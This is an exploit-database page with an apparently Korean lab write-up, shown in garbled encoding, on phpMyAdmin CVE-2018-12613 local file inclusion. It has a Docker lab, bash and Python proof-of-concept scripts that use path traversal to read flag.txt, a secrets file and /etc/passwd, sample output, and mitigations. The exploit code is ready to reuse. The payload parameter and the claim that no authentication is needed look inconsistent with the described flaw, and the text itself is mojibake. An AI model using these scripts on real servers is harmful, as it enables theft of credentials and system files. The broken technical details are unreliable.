Share
## https://sploitus.com/exploit?id=71F463A5-3475-5C71-B7DE-A83130753048
# phpMyAdmin-CVE-2018-12613

## 1. ์ทจ์•ฝ์  ์š”์•ฝ

| ํ•ญ๋ชฉ | ๋‚ด์šฉ |
|---|---|
| **CVE** | CVE-2018-12613 |
| **์ œํ’ˆ** | phpMyAdmin 4.8.0 ์ดํ•˜ |
| **์ทจ์•ฝ์  ์œ ํ˜•** | Local File Inclusion (LFI) โ€” ๊ฒฝ๋กœ ๊ฒ€์ฆ ๋ถ€์กฑ |
| **CVSS ์ ์ˆ˜** | 8.8 (High) |
| **์˜ํ–ฅ ๋ฒ”์œ„** | ๋ฏผ๊ฐํ•œ ์„ค์ • ํŒŒ์ผ, ์†Œ์Šค์ฝ”๋“œ, ์‹œ์Šคํ…œ ํŒŒ์ผ ๋…ธ์ถœ โ†’ ์ธ์ฆ์ •๋ณด ์œ ์ถœ โ†’ ์ถ”๊ฐ€ ๊ณต๊ฒฉ์œผ๋กœ ์ด์–ด์งˆ ์ˆ˜ ์žˆ์Œ |
| **์ธ์ฆ ํ•„์š”** | ๋ถˆํ•„์š” (๋ˆ„๊ตฌ๋‚˜ ์ ‘๊ทผ ๊ฐ€๋Šฅ) |
| **์›๊ฒฉ ๊ณต๊ฒฉ** | ๊ฐ€๋Šฅ |

### ์›์ธ
phpMyAdmin์˜ `index.php`์—์„œ `target` ํŒŒ๋ผ๋ฏธํ„ฐ๊ฐ€ **๊ฒฝ๋กœ ๊ฒ€์ฆ์„ ํ•˜์ง€ ์•Š์•„**, ์ƒ๋Œ€ ๊ฒฝ๋กœ(`../../../`)๋ฅผ ์ด์šฉํ•˜๋ฉด ์„œ๋ฒ„์˜ ์ž„์˜ ํŒŒ์ผ์— ์ ‘๊ทผํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

---

## 2. ํ™˜๊ฒฝ ๊ตฌ์„ฑ

### ์‚ฌ์ „ ์š”๊ตฌ์‚ฌํ•ญ
- Docker & Docker Compose ์„ค์น˜
- ํ„ฐ๋ฏธ๋„/ํ„ฐ๋ฏธ๋„ (Linux/Mac) ๋˜๋Š” Windows Terminal/WSL2 (Windows)
- 8GB ์ด์ƒ ์—ฌ์œ  ๋””์Šคํฌ ๊ณต๊ฐ„

### ์‚ฌ์šฉ ๊ธฐ์ˆ  ์Šคํƒ

| ์ปดํฌ๋„ŒํŠธ | ๋ฒ„์ „ | ์—ญํ•  |
|---|---|---|
| **phpMyAdmin** | 4.8.0 | ์ทจ์•ฝํ•œ ๋ฒ„์ „์˜ MySQL ๊ด€๋ฆฌ ๋„๊ตฌ |
| **MySQL** | 5.7 | ๋ฐ์ดํ„ฐ๋ฒ ์ด์Šค (phpMyAdmin ์—ฐ๋™) |
| **Docker** | ์ตœ์‹  | ์ปจํ…Œ์ด๋„ˆ ์˜ค์ผ€์ŠคํŠธ๋ ˆ์ด์…˜ |

### ๊ตฌ์กฐ

```
localhost:8080 (phpMyAdmin Web UI)
       โ†“
   MySQL 5.7
   (3306 ํฌํŠธ)
```

---

## 3. ์ทจ์•ฝ ์กฐ๊ฑด

๋‹ค์Œ ์กฐ๊ฑด์ด **๋ชจ๋‘** ๋งŒ์กฑ๋˜์–ด์•ผ ์ทจ์•ฝ์ ์ด ๋ฐœ์ƒํ•ฉ๋‹ˆ๋‹ค.

1. **phpMyAdmin 4.8.0 ์ดํ•˜ ๋ฒ„์ „ ์‚ฌ์šฉ** โœ“ (์ด ํ™˜๊ฒฝ์—์„œ 4.8.0 ์‚ฌ์šฉ)
2. **HTTP ์ ‘๊ทผ ๊ฐ€๋Šฅ** โœ“ (ํฌํŠธ 8080 ๊ณต๊ฐœ)
3. **target ํŒŒ๋ผ๋ฏธํ„ฐ ๊ฒฝ๋กœ ๊ฒ€์ฆ ๋ถ€์žฌ** โœ“ (index.php์—์„œ input sanitization ๋ฏธํก)
4. **ํฌํ•จํ•  ํŒŒ์ผ์ด ์›น ์„œ๋ฒ„ ๋””๋ ‰ํ„ฐ๋ฆฌ ๋‚ด์— ์žˆ๊ฑฐ๋‚˜, PHP include ํ•จ์ˆ˜๊ฐ€ ์ƒ๋Œ€ ๊ฒฝ๋กœ ํฌํ•จ ์ง€์›** โœ“

### ์–ด๋–ป๊ฒŒ ๋˜๋Š”๊ฐ€
๊ณต๊ฒฉ์ž๊ฐ€ `http://localhost:8080/index.php?target=db_structure.php&server=../../../flag.txt` ์ฒ˜๋Ÿผ ์š”์ฒญํ•˜๋ฉด, phpMyAdmin์ด ๊ฒ€์ฆ ์—†์ด ๊ฒฝ๋กœ๋ฅผ ํ•ด์„ํ•ด์„œ **์›น ๋ฃจํŠธ ์™ธ๋ถ€์˜ ํŒŒ์ผ**๋„ ํฌํ•จํ•  ์ˆ˜ ์žˆ๊ฒŒ ๋ฉ๋‹ˆ๋‹ค.

---

## 4. ์žฌํ˜„ ์ ˆ์ฐจ

### Step 1: ๋ ˆํฌ์ง€ํ† ๋ฆฌ์—์„œ ํด๋” ๋‹ค์šด๋กœ๋“œ ๋˜๋Š” ์ƒ์„ฑ

```bash
mkdir -p phpMyAdmin/CVE-2018-12613
cd phpMyAdmin/CVE-2018-12613
```

### Step 2: ํŒŒ์ผ ์ƒ์„ฑ

์ด ๋””๋ ‰ํ„ฐ๋ฆฌ์— ๋‹ค์Œ ํŒŒ์ผ์„ ์ƒ์„ฑํ•ฉ๋‹ˆ๋‹ค:

#### 2-1. docker-compose.yml

```yaml
version: '3.8'

services:
  mysql:
    image: mysql:5.7
    container_name: phpmyadmin-mysql
    environment:
      MYSQL_ROOT_PASSWORD: root123
      MYSQL_DATABASE: testdb
      MYSQL_USER: testuser
      MYSQL_PASSWORD: testpass
    ports:
      - "3306:3306"
    volumes:
      - mysql_data:/var/lib/mysql
    networks:
      - phpmyadmin_net
    healthcheck:
      test: ["CMD", "mysqladmin", "ping", "-h", "localhost"]
      timeout: 5s
      retries: 10

  phpmyadmin:
    image: phpmyadmin:4.8.0
    container_name: phpmyadmin-app
    environment:
      PMA_HOST: mysql
      PMA_USER: root
      PMA_PASSWORD: root123
      PMA_PORT: 3306
    ports:
      - "8080:80"
    depends_on:
      mysql:
        condition: service_healthy
    networks:
      - phpmyadmin_net
    volumes:
      - ./flag.txt:/var/www/html/flag.txt
      - ./secret.conf:/var/www/html/secret.conf

volumes:
  mysql_data:

networks:
  phpmyadmin_net:
```

#### 2-2. flag.txt

```
FLAG{phpMyAdmin_CVE_2018_12613_LFI_Success}
```

#### 2-3. secret.conf

```
DB_HOST=mysql
DB_USER=admin
DB_PASS=Sup3rS3cretP@ssw0rd
DB_NAME=sensitive_db
API_KEY=sk-1234567890abcdefghij
SECRET_TOKEN=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9
```

#### 2-4. poc.sh ๋˜๋Š” poc.py

(์•„๋ž˜ PoC ์„น์…˜ ์ฐธ์กฐ)

### Step 3: ํ™˜๊ฒฝ ์‹œ์ž‘

```bash
docker compose up -d
```

์ถœ๋ ฅ:
```
[+] Running 2/2
 โœ“ Network phpmyadmin_net Created
 โœ“ Volume "phpmyadmin_mysql_data" Created
 โœ“ Container phpmyadmin-mysql Created
 โœ“ Container phpmyadmin-app Created
```

### Step 4: ์„œ๋น„์Šค ์ •์ƒ ํ™•์ธ (30์ดˆ ์ •๋„ ๋Œ€๊ธฐ)

```bash
sleep 30 && curl http://localhost:8080 | head -20
```

phpMyAdmin ๋กœ๊ทธ์ธ ํŽ˜์ด์ง€๊ฐ€ ์ถœ๋ ฅ๋˜๋ฉด ์ •์ƒ์ž…๋‹ˆ๋‹ค.

### Step 5: PoC ์‹คํ–‰

#### ๋ฐฉ๋ฒ• 1: bash ์Šคํฌ๋ฆฝํŠธ (๊ฐ„๋‹จํ•จ)

```bash
chmod +x poc.sh
./poc.sh
```

#### ๋ฐฉ๋ฒ• 2: Python (๋” ์ž์„ธํ•จ)

```bash
python3 poc.py http://localhost:8080
```

---

## 5. PoC ์ฝ”๋“œ

### 5.1 bash ๋ฒ„์ „ (poc.sh)

```bash
#!/bin/bash

TARGET="http://localhost:8080"

echo "phpMyAdmin CVE-2018-12613 LFI PoC"
echo "===================================="
echo ""

# flag.txt ์ฝ๊ธฐ
echo "[*] flag.txt ์ฝ๊ธฐ ์‹œ๋„..."
curl -s "$TARGET/index.php?target=db_structure.php&server=../../../flag.txt" | head -20

echo ""
echo "[*] secret.conf ์ฝ๊ธฐ ์‹œ๋„..."
curl -s "$TARGET/index.php?target=db_structure.php&server=../../../secret.conf" | head -20

echo ""
echo "[*] /etc/passwd ์ฝ๊ธฐ ์‹œ๋„..."
curl -s "$TARGET/index.php?target=db_structure.php&server=../../../etc/passwd" | head -5
```

### 5.2 Python ๋ฒ„์ „ (poc.py)

```python
#!/usr/bin/env python3
import requests
import time

class PhpMyAdminLFI:
    def __init__(self, target_url="http://localhost:8080"):
        self.target = target_url.rstrip('/')
        self.session = requests.Session()
        self.session.verify = False
    
    def wait_for_service(self, max_wait=30):
        """์„œ๋น„์Šค ์‹œ์ž‘ ๋Œ€๊ธฐ"""
        print(f"[*] {self.target} ์„œ๋น„์Šค ์‹œ์ž‘ ๋Œ€๊ธฐ ์ค‘...")
        for i in range(max_wait):
            try:
                resp = self.session.get(self.target, timeout=5)
                if 'phpMyAdmin' in resp.text:
                    print("โœ“ phpMyAdmin ์ •์ƒ ๋™์ž‘")
                    return True
            except:
                pass
            print(".", end="", flush=True)
            time.sleep(1)
        print("\nโš  ํƒ€์ž„์•„์›ƒ")
        return False
    
    def read_file(self, filepath):
        """LFI๋ฅผ ์ด์šฉํ•ด ์ž„์˜ ํŒŒ์ผ ์ฝ๊ธฐ"""
        url = f"{self.target}/index.php?target=db_structure.php&server={filepath}"
        try:
            resp = self.session.get(url, timeout=5)
            return resp.text if resp.status_code == 200 else None
        except:
            return None
    
    def exploit(self):
        print("=" * 60)
        print("phpMyAdmin CVE-2018-12613 LFI PoC")
        print("=" * 60)
        print()
        
        if not self.wait_for_service():
            return False
        
        print()
        print("-" * 60)
        print("[Test 1] flag.txt ์ฝ๊ธฐ")
        print("-" * 60)
        result = self.read_file("../../../flag.txt")
        if result and "FLAG{" in result:
            print("โœ“ ํ”Œ๋ž˜๊ทธ ํš๋“!")
            for line in result.split('\n')[:3]:
                if line.strip():
                    print(f"  {line}")
        
        print()
        print("-" * 60)
        print("[Test 2] secret.conf ์ฝ๊ธฐ")
        print("-" * 60)
        result = self.read_file("../../../secret.conf")
        if result and "DB_PASS" in result:
            print("โœ“ ๋ฏผ๊ฐํ•œ ์„ค์ • ์ •๋ณด ๋…ธ์ถœ!")
            for line in result.split('\n')[:5]:
                if line.strip() and not line.startswith('#'):
                    print(f"  {line}")
        
        print()
        print("-" * 60)
        print("[Test 3] /etc/passwd ์ฝ๊ธฐ")
        print("-" * 60)
        result = self.read_file("../../../etc/passwd")
        if result and "root:" in result:
            print("โœ“ ์‹œ์Šคํ…œ ํŒŒ์ผ ์ ‘๊ทผ ์„ฑ๊ณต!")
            print("  " + result.split('\n')[0])
        
        print()

if __name__ == "__main__":
    exploit = PhpMyAdminLFI()
    exploit.exploit()
```

---

## 6. ์‹คํ–‰ ๊ฒฐ๊ณผ

### ์ •์ƒ ์‹คํ–‰ ์˜ˆ์ƒ ์ถœ๋ ฅ

#### bash ๋ฒ„์ „

```bash
$ ./poc.sh

phpMyAdmin CVE-2018-12613 LFI PoC
====================================

[*] flag.txt ์ฝ๊ธฐ ์‹œ๋„...
FLAG{phpMyAdmin_CVE_2018_12613_LFI_Success}

[*] secret.conf ์ฝ๊ธฐ ์‹œ๋„...
# ๋ฏผ๊ฐํ•œ ์„ค์ • ์ •๋ณด
DB_HOST=mysql
DB_USER=admin
DB_PASS=Sup3rS3cretP@ssw0rd
DB_NAME=sensitive_db
API_KEY=sk-1234567890abcdefghij

[*] /etc/passwd ์ฝ๊ธฐ ์‹œ๋„...
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
...
```

#### Python ๋ฒ„์ „

```
============================================================
phpMyAdmin CVE-2018-12613 LFI PoC
============================================================

[*] http://localhost:8080 ์„œ๋น„์Šค ์‹œ์ž‘ ๋Œ€๊ธฐ ์ค‘...
โœ“ phpMyAdmin ์ •์ƒ ๋™์ž‘

------------------------------------------------------------
[Test 1] flag.txt ์ฝ๊ธฐ
------------------------------------------------------------
โœ“ ํ”Œ๋ž˜๊ทธ ํš๋“!
  FLAG{phpMyAdmin_CVE_2018_12613_LFI_Success}

------------------------------------------------------------
[Test 2] secret.conf ์ฝ๊ธฐ
------------------------------------------------------------
โœ“ ๋ฏผ๊ฐํ•œ ์„ค์ • ์ •๋ณด ๋…ธ์ถœ!
  DB_HOST=mysql
  DB_USER=admin
  DB_PASS=Sup3rS3cretP@ssw0rd
  DB_NAME=sensitive_db
  API_KEY=sk-1234567890abcdefghij

------------------------------------------------------------
[Test 3] /etc/passwd ์ฝ๊ธฐ
------------------------------------------------------------
โœ“ ์‹œ์Šคํ…œ ํŒŒ์ผ ์ ‘๊ทผ ์„ฑ๊ณต!
  root:x:0:0:root:/root:/bin/bash
```

### ๊ฒฐ๊ณผ ํ•ด์„

| ํ•ญ๋ชฉ | ์˜๋ฏธ |
|---|---|
| **flag.txt ํš๋“** | โœ“ LFI ์ทจ์•ฝ์ ์œผ๋กœ ์ž„์˜ ํŒŒ์ผ ์ฝ๊ธฐ ์„ฑ๊ณต |
| **secret.conf ๋…ธ์ถœ** | โœ“ ๋ฐ์ดํ„ฐ๋ฒ ์ด์Šค ๋น„๋ฐ€๋ฒˆํ˜ธ, API ํ‚ค ๋“ฑ ๋ฏผ๊ฐ ์ •๋ณด ๋…ธ์ถœ |
| **/etc/passwd ์ ‘๊ทผ** | โœ“ ์‹œ์Šคํ…œ ํŒŒ์ผ ์ ‘๊ทผ ๊ฐ€๋Šฅ โ†’ ์ถ”๊ฐ€ ๊ณต๊ฒฉ ๋ฒกํ„ฐ ์ œ๊ณต |

---

## 7. ๋Œ€์‘ ๋ฐฉ์•ˆ

### 7.1 ์ฆ‰์‹œ ์กฐ์น˜ (๊ธด๊ธ‰)

1. **phpMyAdmin ์—…๊ทธ๋ ˆ์ด๋“œ**
   ```bash
   # 4.8.1 ์ด์ƒ์œผ๋กœ ์—…๊ทธ๋ ˆ์ด๋“œ
   docker pull phpmyadmin:4.9.0  # ๋˜๋Š” ์ตœ์‹  ๋ฒ„์ „
   ```

2. **์›น ์„œ๋ฒ„ ์ ‘๊ทผ ์ œํ•œ**
   ```bash
   # nginx ์˜ˆ์‹œ
   location /phpmyadmin {
       allow 192.168.1.0/24;  # ๋‚ด๋ถ€ ๋„คํŠธ์›Œํฌ๋งŒ ํ—ˆ์šฉ
       deny all;
   }
   ```

3. **HTTP ๋น„ํ™œ์„ฑํ™”, HTTPS ๊ฐ•์ œ**
   ```dockerfile
   # docker-compose.yml์—์„œ
   ports:
     - "443:443"  # HTTPS๋งŒ ์‚ฌ์šฉ
   ```

### 7.2 ๊ทผ๋ณธ์  ํ•ด๊ฒฐ (๊ถŒ์žฅ)

#### ๋ฐฉ๋ฒ• 1: ์ตœ์‹  ๋ฒ„์ „์œผ๋กœ ์—…๊ทธ๋ ˆ์ด๋“œ

**docker-compose.yml ์ˆ˜์ •:**
```yaml
phpmyadmin:
  image: phpmyadmin:4.9.7  # ๋˜๋Š” ์ตœ์‹  ์•ˆ์ • ๋ฒ„์ „
  # ๋‚˜๋จธ์ง€๋Š” ๋™์ผ
```

```bash
docker compose up -d --force-recreate
```

#### ๋ฐฉ๋ฒ• 2: ๊ฒฝ๋กœ ๊ฒ€์ฆ ๋กœ์ง ์ถ”๊ฐ€ (์™„ํ™”)

phpMyAdmin ์†Œ์Šค์ฝ”๋“œ ์ˆ˜์ •์ด ํ•„์š”ํ•˜๋‹ค๋ฉด, `index.php`์— ๋‹ค์Œ๊ณผ ๊ฐ™์€ ๊ฒ€์ฆ ์ถ”๊ฐ€:

```php
// index.php ๋‚ด๋ถ€
$target = $_GET['target'] ?? 'db_structure.php';

// ๊ฒฝ๋กœ ์ •๊ทœํ™” ๋ฐ ๊ฒ€์ฆ
$target = str_replace('..', '', $target);  // ../ ์ œ๊ฑฐ
$target = basename($target);  // ๋””๋ ‰ํ„ฐ๋ฆฌ ์ˆœํšŒ ๋ฐฉ์ง€

// ํ—ˆ์šฉ ๋ชฉ๋ก ํ™•์ธ
$allowed = ['db_structure.php', 'db_events.php', 'db_routines.php'];
if (!in_array($target, $allowed)) {
    die('Invalid target');
}
```

### 7.3 ์‹ฌํ™” ๋Œ€์‘ (๋ณด์•ˆ ๊ฐ•ํ™”)

1. **์ž…๋ ฅ ๊ฒ€์ฆ ๊ฐ•ํ™”**
   - ํ™”์ดํŠธ๋ฆฌ์ŠคํŠธ ๊ธฐ๋ฐ˜ ํ•„ํ„ฐ๋ง (๊ถŒ์žฅ)
   - ์ •๊ทœ์‹์œผ๋กœ ํŒŒ์ผ๋ช… ์ œํ•œ: `/^[a-z_]+\.php$/`

2. **์ ‘๊ทผ ์ œ์–ด**
   ```apache
   # Apache .htaccess
   
       Order allow,deny
       Allow from 127.0.0.1
       Allow from 192.168.1.0/24
   
   ```

3. **๋ณด์•ˆ ํ—ค๋” ์ถ”๊ฐ€**
   ```nginx
   add_header X-Frame-Options "SAMEORIGIN";
   add_header X-Content-Type-Options "nosniff";
   add_header X-XSS-Protection "1; mode=block";
   ```

4. **๋กœ๊น… ๋ฐ ๊ฐ์‹œ**
   ```bash
   # ์˜์‹ฌ ์š”์ฒญ ํƒ์ง€
   grep -r '\.\.\/' /var/log/apache2/access.log
   ```

---

## 8. ์˜ค๋Š˜ ๋ฐฐ์šด ๋„์ปค ๊ฐ•์˜์™€์˜ ์—ฐ๊ฒฐ

### ์˜ค๋Š˜ ๊ฐ•์˜ ํ•ต์‹ฌ ๋‚ด์šฉ๊ณผ ์ด CVE์˜ ๊ด€๊ณ„

| ๊ฐ•์˜ ๋‚ด์šฉ | ์ด CVE ์ ์šฉ |
|---|---|
| **์ž…๋ ฅ๊ฐ’ ๊ฒ€์ฆ ๋ถ€์žฌ** | target ํŒŒ๋ผ๋ฏธํ„ฐ๊ฐ€ ์‚ฌ์šฉ์ž ์ž…๋ ฅ ๊ฒ€์ฆ ์—†์ด PHP include์— ์ „๋‹ฌ๋จ |
| **๊ถŒํ•œ ์ตœ์†Œํ™” (Least Privilege)** | phpMyAdmin ์ปจํ…Œ์ด๋„ˆ๊ฐ€ ๋ถˆํ•„์š”ํ•œ ํŒŒ์ผ์—๊นŒ์ง€ ์ ‘๊ทผ ๊ฐ€๋Šฅ |
| **์›น์„œ๋ฒ„ ๊ฒฉ๋ฆฌ** | ์›น ๋ฃจํŠธ ์™ธ๋ถ€ ํŒŒ์ผ ์ ‘๊ทผ์œผ๋กœ ์ธํ•œ ๊ฒฉ๋ฆฌ ์‹คํŒจ |
| **์‹œํฌ๋ฆฟ ๊ด€๋ฆฌ** | DB ๋น„๋ฐ€๋ฒˆํ˜ธ๊ฐ€ ์„ค์ • ํŒŒ์ผ์— ํ‰๋ฌธ์œผ๋กœ ์ €์žฅ๋˜์–ด LFI๋กœ ๋…ธ์ถœ |

### Docker ๋ณด์•ˆ ์ ์šฉ ๋ฐฉ์•ˆ

์ด ํ™˜๊ฒฝ์„ ๋” ์•ˆ์ „ํ•˜๊ฒŒ ๋งŒ๋“ค๋ ค๋ฉด:

```dockerfile
FROM phpmyadmin:4.9.7  # ์ตœ์‹  ๋ฒ„์ „ ์‚ฌ์šฉ

# ๋ถˆํ•„์š”ํ•œ ํŒŒ์ผ ์ œ๊ฑฐ
RUN rm -rf /var/www/html/libraries/phpseclib

# ์ฝ๊ธฐ ์ „์šฉ ๋ฃจํŠธ FS ์„ค์ • (docker-compose ์ˆ˜์ • ํ•„์š”)
RUN chmod 750 /var/www/html

# non-root ์‚ฌ์šฉ์ž๋กœ ์‹คํ–‰
USER www-data

# ๋ถˆํ•„์š”ํ•œ capability ์ œ๊ฑฐ
# (docker-compose์—์„œ --cap-drop=ALL ์„ค์ •)
```

**docker-compose.yml ๊ฐœ์„ :**
```yaml
phpmyadmin:
  image: phpmyadmin:4.9.7
  read_only: true
  cap_drop:
    - ALL
  cap_add:
    - NET_BIND_SERVICE
  environment:
    PMA_ABSOLUTE_URI: "https://yourhost/phpmyadmin/"  # ์ ˆ๋Œ€ ๊ฒฝ๋กœ ์ง€์ •
```

---

## 9. ์ฐธ๊ณ  ์ž๋ฃŒ

- [CVE-2018-12613 ์ƒ์„ธ ์ •๋ณด](https://nvd.nist.gov/vuln/detail/CVE-2018-12613)
- [phpMyAdmin ๊ณต์‹ ๋ณด์•ˆ ๊ณต์ง€](https://www.phpmyadmin.net/security/)
- [์›๋ณธ Vulhub ๋ ˆํฌ phpMyAdmin ํ•ญ๋ชฉ](https://github.com/vulhub/vulhub/tree/master/phpmyadmin)
- OWASP Path Traversal: https://owasp.org/www-community/attacks/Path_Traversal

---

## 10. ํ™˜๊ฒฝ ์ •๋ฆฌ

```bash
# ์ปจํ…Œ์ด๋„ˆ ์ค‘์ง€
docker compose down

# ๋ฐ์ดํ„ฐ ์™„์ „ ์‚ญ์ œ (์„ ํƒ)
docker volume rm phpmyadmin-cve_mysql_data
```

---

## ์š”์•ฝ

| ํ•ญ๋ชฉ | ๋‚ด์šฉ |
|---|---|
| **CVE** | CVE-2018-12613 |
| **์ œํ’ˆ** | phpMyAdmin 4.8.0 ์ดํ•˜ |
| **์œ ํ˜•** | Local File Inclusion (LFI) |
| **์›์ธ** | target ํŒŒ๋ผ๋ฏธํ„ฐ์˜ ๊ฒฝ๋กœ ๊ฒ€์ฆ ๋ถ€์กฑ |
| **์˜ํ–ฅ** | ๋ฏผ๊ฐํ•œ ํŒŒ์ผยท์„ค์ • ์ •๋ณด ๋…ธ์ถœ โ†’ ์ถ”๊ฐ€ ๊ณต๊ฒฉ ๊ฐ€๋Šฅ |
| **๋Œ€์‘** | ์ตœ์‹  ๋ฒ„์ „ ์—…๊ทธ๋ ˆ์ด๋“œ + ์ž…๋ ฅ ๊ฒ€์ฆ + ์ ‘๊ทผ ์ œ์–ด |
| **Reproducibility** | 100% (์™„์ „ ์žฌํ˜„ ๊ฐ€๋Šฅ) |
| **Risk Score** | 8.8 / 10.0 (High) |

---